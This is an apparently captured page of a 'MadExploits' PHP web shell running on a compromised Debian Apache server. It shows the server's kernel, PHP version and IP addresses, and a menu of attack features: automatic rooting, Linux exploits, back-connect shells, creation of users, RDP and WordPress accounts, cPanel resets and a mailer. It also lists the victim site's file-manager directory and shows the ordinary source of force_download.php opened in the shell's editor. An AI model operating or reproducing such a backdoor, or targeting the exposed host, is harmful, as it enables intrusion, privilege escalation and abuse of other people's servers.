Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.116.118.214
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
lib /
filemanagerOLD /
[ HOME SHELL ]
Name
Size
Permission
Action
ViewerJS
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
jPlayer
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
uploader
[ DIR ]
drwxr-xr-x
ajax_calls.php
16.94
KB
-rw-r--r--
dialog.php
47.1
KB
-rw-r--r--
execute.php
14.15
KB
-rw-r--r--
force_download.php
1016
B
-rw-r--r--
plugin.js
3.08
KB
-rw-r--r--
plugin.min.js
1.9
KB
-rw-r--r--
upload.php
5.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : force_download.php
<?php include 'config/config.php'; if($_SESSION['RF']["verify"] != "RESPONSIVEfilemanager") die('forbiden'); include 'include/utils.php'; include 'include/mime_type_lib.php'; if(strpos($_POST['path'],'/')===0 || strpos($_POST['path'],'../')!==FALSE || strpos($_POST['path'],'./')===0) die('wrong path'); if(strpos($_POST['name'],'/')!==FALSE) die('wrong path'); $path=$current_path.$_POST['path']; $name=$_POST['name']; $info=pathinfo($name); if(!in_array(fix_strtolower($info['extension']), $ext)){ die('wrong extension'); } $img_size = (string)(filesize($path.$name)); // Get the image size as string $mime_type = get_file_mime_type( $path.$name ); // Get the correct MIME type depending on the file. header('Pragma: private'); header('Cache-control: private, must-revalidate'); header("Content-Type: " . $mime_type); // Set the correct MIME type header("Content-Length: " . $img_size ); header('Content-Disposition: attachment; filename="'.($name).'"'); readfile($path.$name); exit; ?>
Close